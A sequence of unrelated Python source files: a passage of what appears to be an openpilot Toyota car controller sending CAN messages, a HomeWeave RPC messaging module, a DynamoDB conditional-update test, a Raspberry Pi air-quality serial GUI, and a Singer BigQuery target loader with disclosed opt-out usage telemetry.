can_sends.append(create_accel_command(self.packer, 0, pcm_cancel_cmd, False, lead, CS.distance))
if (frame % 2 == 0) and (CS.CP.enableGasInterceptor):
# send exactly zero if apply_gas is zero. Interceptor will send the max between read value and apply_gas.
# This prevents unexpected pedal range rescaling
can_sends.append(create_gas_command(self.packer, apply_gas, frame//2))
# ui mesg is at 100Hz but we send asap if:
# - there is something to display
# - there is something to stop displaying
fcw_alert = hud_alert == VisualAlert.fcw
steer_alert = hud_alert == VisualAlert.steerRequired
send_ui = False
if ((fcw_alert or steer_alert) and not self.alert_active) or \
(not (fcw_alert or steer_alert) and self.alert_active):
send_ui = True
self.alert_active = not self.alert_active
elif pcm_cancel_cmd:
# forcing the pcm to disengage causes a bad fault sound so play a good sound instead
send_ui = True
if (frame % 100 == 0 or send_ui) and Ecu.fwdCamera in self.fake_ecus:
can_sends.append(create_ui_command(self.packer, steer_alert, pcm_cancel_cmd, left_line, right_line, left_lane_depart, right_lane_depart))
if frame % 100 == 0 and (Ecu.dsu in self.fake_ecus or Ecu.unknown in self.fake_ecus):
can_sends.append(create_fcw_command(self.packer, fcw_alert))
#*** static msgs ***
for (addr, ecu, cars, bus, fr_step, vl) in STATIC_MSGS:
if frame % fr_step == 0 and ecu in self.fake_ecus and CS.CP.carFingerprint in cars:
## special cases
#if fr_step == 5 and ecu == Ecu.fwdCamera and bus == 1:
# #print(addr)
# cnt = int(((frame / 5) % 7) + 1) << 5
# vl = bytes([cnt]) + vl
#elif addr in (0x489, 0x48a) and bus == 0:
# #print(addr)
# # add counter for those 2 messages (last 4 bits)
# cnt = int((frame/100)%0xf) + 1
# if addr == 0x48a:
# # 0x48a has a 8 preceding the counter
# cnt += 1 << 7
# vl += bytes([cnt])
can_sends.append(make_can_msg(addr, vl, bus))
# Enable blindspot debug mode once
if frame > 1000 and not (CS.CP.carFingerprint in TSS2_CAR or CS.CP.carFingerprint in [CAR.CAMRY, CAR.CAMRYH, CAR.AVALON_2021]): # 10 seconds after start and not a tss2 car
if BLINDSPOTALWAYSON:
self.blindspot_blink_counter_left += 1
self.blindspot_blink_counter_right += 1
#print("debug blindspot alwayson!")
elif CS.out.leftBlinker:
self.blindspot_blink_counter_left += 1
#print("debug Left Blinker on")
elif CS.out.rightBlinker:
self.blindspot_blink_counter_right += 1
#print("debug Right Blinker on")
else:
self.blindspot_blink_counter_left = 0
self.blindspot_blink_counter_right = 0
if self.blindspot_debug_enabled_left:
can_sends.append(set_blindspot_debug_mode(LEFT_BLINDSPOT, False))
#can_sends.append(make_can_msg(0x750, b'\x41\x02\x10\x01\x00\x00\x00\x00', 0))
self.blindspot_debug_enabled_left = False
#print ("debug Left blindspot debug disabled")
if self.blindspot_debug_enabled_right:
can_sends.append(set_blindspot_debug_mode(RIGHT_BLINDSPOT, False))
#can_sends.append(make_can_msg(0x750, b'\x42\x02\x10\x01\x00\x00\x00\x00', 0))
self.blindspot_debug_enabled_right = False
#print("debug Right blindspot debug disabled")
if self.blindspot_blink_counter_left > 9 and not self.blindspot_debug_enabled_left: #check blinds
can_sends.append(set_blindspot_debug_mode(LEFT_BLINDSPOT, True))
#can_sends.append(make_can_msg(0x750, b'\x41\x02\x10\x60\x00\x00\x00\x00', 0))
#print("debug Left blindspot debug enabled")
self.blindspot_debug_enabled_left = True
if self.blindspot_blink_counter_right > 5 and not self.blindspot_debug_enabled_right: #enable blindspot debug mode
if CS.out.vEgo > 6: #polling at low speeds switches camera off
#can_sends.append(make_can_msg(0x750, b'\x42\x02\x10\x60\x00\x00\x00\x00', 0))
can_sends.append(set_blindspot_debug_mode(RIGHT_BLINDSPOT, True))
#print("debug Right blindspot debug enabled")
self.blindspot_debug_enabled_right = True
if CS.out.vEgo < 6 and self.blindspot_debug_enabled_right: # if enabled and speed falls below 6m/s
#can_sends.append(make_can_msg(0x750, b'\x42\x02\x10\x01\x00\x00\x00\x00', 0))
can_sends.append(set_blindspot_debug_mode(RIGHT_BLINDSPOT, False))
self.blindspot_debug_enabled_right = False
#print("debug Right blindspot debug disabled")
if self.blindspot_debug_enabled_left:
if frame % 20 == 0 and frame > 1001: # Poll blindspots at 5 Hz
can_sends.append(poll_blindspot_status(LEFT_BLINDSPOT))
#can_sends.append(make_can_msg(0x750, b'\x41\x02\x21\x69\x00\x00\x00\x00', 0))
#print("debug Left blindspot poll")
if self.blindspot_debug_enabled_right:
if frame % 20 == 10 and frame > 1005: # Poll blindspots at 5 Hz
#can_sends.append(make_can_msg(0x750, b'\x42\x02\x21\x69\x00\x00\x00\x00', 0))
can_sends.append(poll_blindspot_status(RIGHT_BLINDSPOT))
#print("debug Right blindspot poll")
return can_sends
|
rpc.py
|
import inspect
import logging
from concurrent.futures import ThreadPoolExecutor
from threading import Thread, RLock, Event
from uuid import uuid4
from jsonschema import Draft4Validator
from weavelib.messaging import Sender, Receiver
from weavelib.messaging.messaging import raise_message_exception
from weavelib.exceptions import WeaveException, BadArguments
from weavelib.services import MessagingEnabled
from .api import API, ArgParameter, KeywordParameter
logger = logging.getLogger(__name__)
MESSAGING_PLUGIN_URL = "https://github.com/HomeWeave/WeaveServer.git"
def api_group_schema(apis):
return {
"anyOf": [x.schema for x in apis]
}
class RemoteAPIError(RuntimeError):
"""Raised to indicate exception thrown by remote API."""
class ClientAPI(API):
def __init__(self, name, desc, params, handler):
super(ClientAPI, self).__init__(name, desc, params)
self.handler = handler
def __call__(self, *args, _block=False, _callback=None, **kwargs):
obj = self.validate_call(*args, **kwargs)
return self.handler(obj, block=_block, callback=_callback)
@staticmethod
def from_info(info, handler):
api = ClientAPI(info["name"], info["description"], [], handler)
api.args = [ArgParameter.from_info(x) for x in info.get("args", [])]
api.kwargs = [KeywordParameter.from_info(x) for x in
info.get("kwargs", {}).values()]
return api
class ServerAPI(API):
def __init__(self, name, desc, params, handler):
super(ServerAPI, self).__init__(name, desc, params)
self.handler = handler
def __call__(self, *args, **kwargs):
self.validate_call(*args, **kwargs)
return self.handler(*args, **kwargs)
class RPC(object):
def __init__(self, name, description, apis):
self.name = name
self.description = description
self.apis = {x.name: x for x in apis}
def __getitem__(self, name):
return self.apis[name]
@property
def request_schema(self):
return {
"type": "object",
"properties": {
"invocation": api_group_schema(self.apis.values()),
}
}
@property
def response_schema(self):
return {"type": "object"}
class RPCReceiver(Receiver):
def __init__(self, conn, component, queue, host="localhost", **kwargs):
super(RPCReceiver, self).__init__(conn, queue, host=host, **kwargs)
self.component = component
def on_message(self, msg, headers):
self.component.on_rpc_message(msg, headers)
class RPCServer(RPC):
MAX_RPC_WORKERS = 5
def __init__(self, name, description, apis, service,
allowed_requestors=None):
if not isinstance(service, MessagingEnabled):
raise BadArguments("Service is not messaging enabled.")
super(RPCServer, self).__init__(name, description, apis)
self.service = service
self.executor = ThreadPoolExecutor(self.MAX_RPC_WORKERS)
self.sender = None
self.receiver = None
self.receiver_thread = None
self.cookie = None
self.appmgr_client = None
self.allowed_requestors = allowed_requestors or []
def register_rpc(self):
apis = {name: api.info for name, api in self.apis.items()}
# TODO: This means one extra RPC for every registration. Clean up.
result = self.appmgr_client["register_rpc"](self.name, self.description,
apis,
self.allowed_requestors,
_block=True)
return result
def update_rpc(self, callback=None):
apis = {name: api.info for name, api in self.apis.items()}
return self.appmgr_client["update_rpc"](self.name, apis,
_block=(not callback),
_callback=callback)
def start(self):
conn = self.service.get_connection()
auth_token = self.service.get_auth_token()
self.appmgr_client = self.get_appmgr_client()
self.appmgr_client.start()
rpc_info = self.register_rpc()
self.sender = Sender(conn, rpc_info["response_queue"], auth=auth_token)
self.receiver = RPCReceiver(conn, self, rpc_info["request_queue"],
auth=auth_token)
self.sender.start()
self.receiver.start()
self.receiver_thread = Thread(target=self.receiver.run)
self.receiver_thread.start()
def get_appmgr_client(self):
# This is so that RootRPCServer in WeaveServer need not create an
# RPCClient to itself.
rpc_info = find_rpc(self.service, MESSAGING_PLUGIN_URL, "app_manager")
return RPCClient(self.service.get_connection(), rpc_info,
self.service.get_auth_token())
def stop(self):
self.appmgr_client["unregister_rpc"](self.name, _block=True)
self.appmgr_client.stop()
# TODO: Delete the queue, too.
self.receiver.stop()
self.receiver_thread.join()
self.executor.shutdown()
def on_rpc_message(self, rpc_obj, headers):
def make_done_callback(request_id, cmd, cookie):
def callback(future):
try:
self.sender.send({
"id": request_id,
"command": cmd,
"result": future.result()
}, headers={"COOKIE": cookie})
except WeaveException as e:
logger.warning("WeaveException was raised by API: %s", e)
self.sender.send({
"id": request_id,
"command": cmd,
"error_name": e.err_msg(),
"error": e.extra
}, headers={"COOKIE": cookie})
except Exception as e:
logger.exception("Internal API raised exception: %s", e)
self.sender.send({
"id": request_id,
"command": cmd,
"error": "Internal API Error."
}, headers={"COOKIE": cookie})
return callback
def execute_api_internal(rpc_obj, headers, api, *args, **kwargs):
# Keep this function name in sync with the one in get_rpc_caller(..)
return api(*args, **kwargs)
obj = rpc_obj["invocation"]
cookie = rpc_obj["response_cookie"]
request_id = obj["id"]
cmd = obj["command"]
try:
api = self[cmd]
except KeyError:
self.sender.send({
"id": request_id,
"result": False,
"error": "API not found."
})
return
args = obj.get("args", [])
kwargs = obj.get("kwargs", {})
future = self.executor.submit(execute_api_internal, rpc_obj, headers,
api, *args, **kwargs)
future.add_done_callback(make_done_callback(request_id, cmd, cookie))
@property
def info_message(self):
return {
"name": self.name,
"description": self.description,
"apis": {name: api.info for name, api in self.apis.items()},
"request_queue": self.receiver.channel,
"response_queue": self.sender.channel
}
class RPCClient(RPC):
def __init__(self, conn, rpc_info, token=None):
self.token = token
name = rpc_info["name"]
description = rpc_info["description"]
apis = [self.get_api_call(x) for x in rpc_info["apis"].values()]
super(RPCClient, self).__init__(name, description, apis)
self.client_cookie = "rpc-client-cookie-" + str(uuid4())
self.sender = Sender(conn, rpc_info["request_queue"], auth=self.token)
self.receiver = RPCReceiver(conn, self, rpc_info["response_queue"],
cookie=self.client_cookie)
self.receiver_thread = Thread(target=self.receiver.run)
self.callbacks = {}
self.callbacks_lock = RLock()
def start(self):
self.sender.start()
self.receiver.start()
self.receiver_thread.start()
def stop(self):
self.sender.close()
self.receiver.stop()
self.receiver_thread.join()
def get_api_call(self, obj):
def make_blocking_callback(event, response_arr):
def callback(obj):
response_arr.append(obj)
event.set()
return callback
def on_invoke(obj, block, callback):
msg_id = obj["id"]
if block:
res_arr = []
event = Event()
callback = make_blocking_callback(event, res_arr)
if callback:
with self.callbacks_lock:
self.callbacks[msg_id] = callback
self.sender.send({
"invocation": obj,
"response_cookie": self.client_cookie
}, headers={"AUTH": self.token})
if not block:
return
event.wait()
return extract_rpc_payload(res_arr[0])
return ClientAPI.from_info(obj, on_invoke)
def on_rpc_message(self, msg, headers):
with self.callbacks_lock:
callback = self.callbacks.pop(msg["id"], None)
if not callback:
return
callback(msg)
def get_rpc_caller():
for frame, _, _, func, _, _ in inspect.stack(context=0):
if func == 'execute_api_internal':
if "headers" not in frame.f_locals:
continue
return frame.f_locals["headers"].get("AUTH")
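# Typical use: called from inside an API handler while it runs on the RPCServer executor;
# the stack walk finds the execute_api_internal frame above and returns that request's
# AUTH header, letting the handler identify the calling app.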
def find_rpc(service, app_url, rpc_name):
token = service.get_auth_token()
conn = service.get_connection()
rpc_info = {
"name": "",
"description": "",
"apis": {
"rpc_info": {
"name": "rpc_info",
"description": "",
"args": [
{
"name": "app_url",
"description": "",
"schema": {"type": "string"}
},
{
"name": "rpc_name",
"description": "",
"schema": {"type": "string"}
},
]
}
},
"request_queue": "/_system/registry/request",
"response_queue": "/_system/registry/response",
}
client = RPCClient(conn, rpc_info, token)
client.start()
res = client["rpc_info"](app_url, rpc_name, _block=True)
client.stop()
return res
def extract_rpc_payload(response):
if "result" in response:
return response["result"]
elif "error_name" in response:
raise_message_exception(response["error_name"], response.get("error"))
else:
raise RemoteAPIError(response.get("error"))
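# Usage sketch (illustrative only; assumes an already-constructed MessagingEnabled
# service and an app registered under the URL shown, both of which are assumptions,
# not part of this module):
#
#     def ping():
#         return "pong"
#
#     server = RPCServer("demo", "Demo RPC", [ServerAPI("ping", "Liveness check", [], ping)],
#                        service)
#     server.start()  # registers with app_manager and starts serving requests
#
#     rpc_info = find_rpc(service, "https://github.com/HomeWeave/Demo.git", "demo")
#     client = RPCClient(service.get_connection(), rpc_info, service.get_auth_token())
#     client.start()
#     assert client["ping"](_block=True) == "pong"
#     client.stop()
#     server.stop()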
|
dynamodb_conditional_update.py
|
import boto3,os
from boto3.dynamodb.conditions import Key
import argparse
from datetime import datetime
from botocore.exceptions import ClientError
from boto3.dynamodb.conditions import Attr, AttributeNotExists
datasource = 'flight-19096'
partition_key = '20200428'
table_name = 'ygpp-devl-ingestion-notification'
def get_boto3_resource(service='s3'):
session = boto3.session.Session()
return session.resource(service)
def get_item():
dynamodb = get_boto3_resource('dynamodb')
table = dynamodb.Table(table_name)
resp = table.get_item(
Key={
'datasource': datasource,
'partitionkey': partition_key,
}
)
print(resp)
def update(col_name, col_val):
dynamodb = get_boto3_resource('dynamodb')
table = dynamodb.Table(table_name)
resp = table.update_item(
Key={
'datasource': datasource,
'partitionkey': partition_key,
},
UpdateExpression="set " + col_name + " = :value",
ExpressionAttributeValues={
':value': col_val
},
ReturnValues="UPDATED_NEW"
)
print(resp)
'''
S3 versioning is enabled.
Multiple ingestion updates can come in for the same partition key; using the S3 version
tag, only update the item if the incoming ingestion trigger is for the latest version.
This happens when the downstream system does some processing that fires hundreds of S3
triggers almost simultaneously, so validation was failing because the lambda was reading
an older version of the file.
The best solution is to fix this at the downstream end, but the consumer does not have
control over that at this time. Another option is to schedule a lambda S3 pull instead of
an S3 trigger, if the processing happens at a particular time, such as market close.
'''
def update_with_condition(col_name, col_val, ver_val):
dynamodb = get_boto3_resource('dynamodb')
table = dynamodb.Table(table_name)
try:
resp = table.update_item(
Key={
'datasource': datasource,
'partitionkey': partition_key,
},
UpdateExpression = "set " + col_name + " = :value, ver = :ver",
# update only if the ver attribute does not exist, or the incoming version is newer than the version already stored in DynamoDB
ConditionExpression= ' attribute_not_exists(ver) or :ver > ver ',
ExpressionAttributeValues={
':value' : col_val,
':ver' : ver_val
},
ReturnValues="UPDATED_NEW"
)
print(resp)
except ClientError as e:
if e.response['Error']['Code'] == 'ConditionalCheckFailedException':
print(e.response['Error'])
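# Illustrative sketch (not part of the original script): wiring update_with_condition to an
# S3-triggered lambda handler. The event shape follows the standard S3 notification format;
# the 'checksum' column name and the eventTime-derived version number are assumptions here.
def lambda_handler_sketch(event, context):
    for record in event.get('Records', []):
        obj = record['s3']['object']
        # eventTime is ISO 8601 with milliseconds, e.g. '2020-04-28T07:41:12.345Z'; turn it
        # into an increasing integer so the ':ver > ver' ConditionExpression orders updates
        ver_val = int(datetime.strptime(record['eventTime'], '%Y-%m-%dT%H:%M:%S.%fZ').timestamp() * 1000)
        update_with_condition('checksum', obj.get('eTag', ''), ver_val)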
'''
The following code tests that the DynamoDB conditional update
works as desired when multiple updates happen on the same row/record.
'''
import threading
col_checksumver = 'checksumver'
col_ver = 'valueofver'
def worker(col_name, col_val, ver):
"""thread worker function"""
update_with_condition(col_name, col_val, ver)
return
'''
Once the threads are started (t.start()), one cannot say which thread will run to completion first.
'''
def run():
threads = []
for i in range(40, 20, -2):
print(str(i) + '...')
t = threading.Thread(target=worker, args=(col_checksumver + str(i), col_ver + str(i) + " " + datetime.now().strftime('%Y%m%d%H%M%S%f'), i))
threads.append(t)
t.start()
for t in threads:
t.join() # wait for the thread to complete
# see the update
print('get item')
get_item()
if __name__ == '__main__':
run()
|
aq_test.py
|
import serial
import serial.tools.list_ports
import threading
import time
from guizero import App, Text, PushButton, CheckBox, Slider, TextBox
temp = 0
e_co2 = 0
ser = serial.Serial("/dev/ttyS0", 9600)
def clear_console():
console.value = ""
app = App(title="Raspberry Pi AQ", layout="grid")
console = TextBox(app, width=40, height=15, scrollbar=True, multiline=True, grid=[0, 6, 2, 1])
log_checkbox = CheckBox(app, text="Log", grid=[0,5])
PushButton(app, text="Clear Console", command=clear_console, grid=[1,5])
def log(message):
if log_checkbox.value:
console.value += message
def send(message):
log(">"+message)
ser.write(bytes(message+"\n", 'utf-8'))
def wait_for_message():
global temp, e_co2
time.sleep(0.1) # give attiny time to respond
t0=time.monotonic()
incoming_message = str(ser.readline()[:-2].decode("utf-8")) # strip the trailing CR/LF and decode to a string
# print("incoming_message: " + incoming_message)
t1=time.monotonic()
# print(t1-t0)
log("<" + incoming_message)
message_parts = incoming_message.split("=")
if len(message_parts) == 2:
code, value = message_parts
if code == "t":
temp = float(value)
elif code == "c":
e_co2 = float(value)
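# Protocol note (inferred from the parsing above): the ATtiny replies with "code=value"
# lines, e.g. "t=23.5" for temperature in degrees C and "c=412.0" for eCO2 in ppm.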
def checkbox_changed():
if checkbox.value == 1:
send("m")
#ser.write(b"m\n")
else:
ser.write(b"a\n")
def update_readings():
while True:
send("t")
wait_for_message()
time.sleep(0.1) # give attiny time to respond
send("c")
wait_for_message()
time.sleep(1)
temp_c_field.value = str(temp)
eco2_field.value = str(e_co2)
t1 = threading.Thread(target=update_readings)
def slider_changed(slider_value):
send(str(slider_value))
def buzzer_on():
send("b")
def buzzer_off():
send("q")
log("Start")
Text(app, text="Temp (C)", grid=[0,0], )
temp_c_field = Text(app, text="-", grid=[1,0])
Text(app, text="eCO2 (ppm)", grid=[0,1])
eco2_field = Text(app, text="-", grid=[1,1])
checkbox = CheckBox(app, text="LEDs Manual", command=checkbox_changed, grid=[0,2])
Text(app, text="LED Level", grid=[0,3])
slider = Slider(app, start=0, end=6, command=slider_changed, grid=[1,3])
PushButton(app, text="Buzzer on", command=buzzer_on, grid=[0,4])
PushButton(app, text="Buzzer off", command=buzzer_off, grid=[1,4])
t1.start()
app.display()
|
target_bigquery.py
|
#!/usr/bin/env python3
import argparse
import collections
import http.client
import io
import json
import logging
import sys
import threading
import urllib
from tempfile import TemporaryFile
from typing import List
import pkg_resources
import singer
from google.api_core import exceptions
from google.cloud import bigquery
from google.cloud.bigquery import Dataset, WriteDisposition
from google.cloud.bigquery import LoadJobConfig
from google.cloud.bigquery import SchemaField
from google.cloud.bigquery.job import SourceFormat
from jsonschema import validate
from oauth2client import tools
try:
parser = argparse.ArgumentParser(parents=[tools.argparser])
parser.add_argument('-c', '--config', help='Config file', required=True)
flags = parser.parse_args()
except ImportError:
flags = None
logging.getLogger('googleapiclient.discovery_cache').setLevel(logging.ERROR)
logger = singer.get_logger()
SCOPES = ['https://www.googleapis.com/auth/bigquery', 'https://www.googleapis.com/auth/bigquery.insertdata']
CLIENT_SECRET_FILE = 'client_secret.json'
APPLICATION_NAME = 'Singer BigQuery Target'
StreamMeta = collections.namedtuple('StreamMeta', ['schema', 'key_properties', 'bookmark_properties'])
def emit_state(state):
if state is not None:
line = json.dumps(state)
logger.debug('Emitting state {}'.format(line))
sys.stdout.write("{}\n".format(line))
sys.stdout.flush()
def clear_dict_hook(items):
return {k: v if v is not None else '' for k, v in items}
def bq_field_sanitize(name):
if name[0].isdigit():
raise Exception("Field name can not start with digit: {}".format(name))
return name.replace('-', '_')
def define_schema(field, name):
schema_name = bq_field_sanitize(name)
schema_type = "STRING"
schema_mode = "NULLABLE"
schema_description = None
schema_fields = ()
if 'type' not in field and 'anyOf' in field:
for types in field['anyOf']:
if types['type'] == 'null':
schema_mode = 'NULLABLE'
else:
field = types
if isinstance(field['type'], list):
if field['type'][0] == "null":
schema_mode = 'NULLABLE'
else:
schema_mode = 'REQUIRED'
schema_type = field['type'][-1]
else:
schema_type = field['type']
if schema_type == "object":
if "properties" not in field.keys():
schema_type = "string"
else:
schema_type = "RECORD"
schema_fields = tuple(build_schema(field))
if not schema_fields:
schema_type = "string"
if schema_type == "array":
items_type = field.get('items').get('type')
schema_type = items_type[-1] if isinstance(items_type, list) else items_type
schema_mode = "REPEATED"
if schema_type == "object":
schema_type = "RECORD"
schema_fields = tuple(build_schema(field.get('items')))
if schema_type == "string":
if "format" in field:
if field['format'] == "date-time":
schema_type = "timestamp"
if schema_type == 'number':
schema_type = 'FLOAT'
return (schema_name, schema_type, schema_mode, schema_description, schema_fields)
def build_schema(schema):
SCHEMA = []
for key in schema['properties'].keys():
if not (bool(schema['properties'][key])):
# skip if we end up with an empty record.
continue
try:
schema_name, schema_type, schema_mode, schema_description, schema_fields = define_schema(
schema['properties'][key], key)
SCHEMA.append(SchemaField(schema_name, schema_type, schema_mode, schema_description, schema_fields))
except Exception:
pass
return SCHEMA
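# Example (illustrative): a Singer schema fragment such as
#   {"properties": {"id": {"type": ["null", "integer"]},
#                   "updated_at": {"type": "string", "format": "date-time"}}}
# is built into
#   [SchemaField('id', 'integer', 'NULLABLE', None, ()),
#    SchemaField('updated_at', 'timestamp', 'NULLABLE', None, ())]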
def persist_lines_job(project_id, dataset_id, lines=None, truncate=False, validate_records=True):
state = None
schemas = {}
key_properties = {}
tables = {}
rows = {}
errors = {}
bigquery_client = bigquery.Client(project=project_id)
# try:
# dataset = bigquery_client.create_dataset(Dataset(dataset_ref)) or Dataset(dataset_ref)
# except exceptions.Conflict:
# pass
for line in lines:
try:
msg = singer.parse_message(line)
except json.decoder.JSONDecodeError:
logger.error("Unable to parse:\n{}".format(line))
raise
if isinstance(msg, singer.RecordMessage):
if msg.stream not in schemas:
raise Exception(
"A record for stream {} was encountered before a corresponding schema".format(msg.stream))
schema = schemas[msg.stream]
if validate_records:
validate(msg.record, schema)
# NEWLINE_DELIMITED_JSON expects literal JSON formatted data, with a newline character splitting each row.
dat = bytes(json.dumps(msg.record) + '\n', 'UTF-8')
rows[msg.stream].write(dat)
# rows[msg.stream].write(bytes(str(msg.record) + '\n', 'UTF-8'))
state = None
elif isinstance(msg, singer.StateMessage):
logger.debug('Setting state to {}'.format(msg.value))
state = msg.value
elif isinstance(msg, singer.SchemaMessage):
table = msg.stream
schemas[table] = msg.schema
key_properties[table] = msg.key_properties
# tables[table] = bigquery.Table(dataset.table(table), schema=build_schema(schemas[table]))
rows[table] = TemporaryFile(mode='w+b')
errors[table] = None
# try:
# tables[table] = bigquery_client.create_table(tables[table])
# except exceptions.Conflict:
# pass
elif isinstance(msg, singer.ActivateVersionMessage):
# This is experimental and won't be used yet
pass
else:
raise Exception("Unrecognized message {}".format(msg))
for table in rows.keys():
table_ref = bigquery_client.dataset(dataset_id).table(table)
SCHEMA = build_schema(schemas[table])
load_config = LoadJobConfig()
load_config.schema = SCHEMA
load_config.source_format = SourceFormat.NEWLINE_DELIMITED_JSON
if truncate:
load_config.write_disposition = WriteDisposition.WRITE_TRUNCATE
rows[table].seek(0)
logger.info("loading {} to Bigquery.\n".format(table))
load_job = bigquery_client.load_table_from_file(
rows[table], table_ref, job_config=load_config)
logger.info("loading job {}".format(load_job.job_id))
logger.info(load_job.result())
# for table in errors.keys():
# if not errors[table]:
# print('Loaded {} row(s) into {}:{}'.format(rows[table], dataset_id, table), tables[table].path)
# else:
# print('Errors:', errors[table], sep=" ")
return state
def apply_string_conversions(record: dict, schema: List[SchemaField], stream):
for schema_field in schema:
# if isinstance(record, list):
rec_field = record.get(schema_field.name)
if rec_field:
if schema_field.field_type == "STRING":
record[schema_field.name] = str(rec_field)
elif schema_field.field_type in ["RECORD", "STRUCT"]:
if schema_field.mode == "REPEATED":
record[schema_field.name] = [apply_string_conversions(rec_item, schema_field.fields, stream + "." + schema_field.name) for rec_item in rec_field]
else:
record[schema_field.name] = apply_string_conversions(rec_field, schema_field.fields, stream + "." + schema_field.name)
return record
def persist_lines_stream(project_id, dataset_id, lines=None, validate_records=True):
state = None
schemas = {}
key_properties = {}
tables = {}
rows = {}
errors = {}
bigquery_client = bigquery.Client(project=project_id)
dataset_ref = bigquery_client.dataset(dataset_id)
dataset = Dataset(dataset_ref)
try:
dataset = bigquery_client.create_dataset(Dataset(dataset_ref)) or Dataset(dataset_ref)
except exceptions.Conflict:
pass
for line in lines:
try:
msg = singer.parse_message(line)
except json.decoder.JSONDecodeError:
logger.error("Unable to parse:\n{}".format(line))
raise
if isinstance(msg, singer.RecordMessage):
if msg.stream not in schemas:
raise Exception(
"A record for stream {} was encountered before a corresponding schema".format(msg.stream))
schema = schemas[msg.stream]
if validate_records:
validate(msg.record, schema)
msg.record = apply_string_conversions(msg.record, tables[msg.stream].schema, msg.stream)
errors[msg.stream] = bigquery_client.insert_rows_json(tables[msg.stream], [msg.record],
ignore_unknown_values=True)
rows[msg.stream] += 1
state = None
elif isinstance(msg, singer.StateMessage):
logger.debug('Setting state to {}'.format(msg.value))
state = msg.value
elif isinstance(msg, singer.SchemaMessage):
table = msg.stream
schemas[table] = msg.schema
key_properties[table] = msg.key_properties
tables[table] = bigquery.Table(dataset.table(table), schema=build_schema(schemas[table]))
rows[table] = 0
errors[table] = None
try:
tables[table] = bigquery_client.create_table(tables[table])
except exceptions.Conflict:
pass
elif isinstance(msg, singer.ActivateVersionMessage):
# This is experimental and won't be used yet
pass
else:
raise Exception("Unrecognized message {}".format(msg))
for table in errors.keys():
if not errors[table]:
logger.info('Loaded {} row(s) into {}:{} ({})'.format(rows[table], dataset_id, table, tables[table].path))
emit_state(state)
else:
logger.error('Errors: {}'.format(errors[table]))
return state
def collect():
try:
version = pkg_resources.get_distribution('target-bigquery').version
conn = http.client.HTTPConnection('collector.singer.io', timeout=10)
conn.connect()
params = {
'e': 'se',
'aid': 'singer',
'se_ca': 'target-bigquery',
'se_ac': 'open',
'se_la': version,
}
conn.request('GET', '/i?' + urllib.parse.urlencode(params))
conn.getresponse()
conn.close()
except Exception:
logger.debug('Collection request failed')
def main():
with open(flags.config) as input:
config = json.load(input)
if not config.get('disable_collection', False):
logger.info('Sending version information to stitchdata.com. ' +
'To disable sending anonymous usage data, set ' +
'the config parameter "disable_collection" to true')
threading.Thread(target=collect).start()
if config.get('replication_method') == 'FULL_TABLE':
truncate = True
else:
truncate = False
validate_records = config.get('validate_records', True)
input = io.TextIOWrapper(sys.stdin.buffer, encoding='utf-8')
if config.get('stream_data', True):
state = persist_lines_stream(config['project_id'], config['dataset_id'], input,
validate_records=validate_records)
else:
state = persist_lines_job(config['project_id'], config['dataset_id'], input, truncate=truncate,
validate_records=validate_records)
emit_state(state)
logger.debug("Exiting normally")
if __name__ == '__main__':
main()
|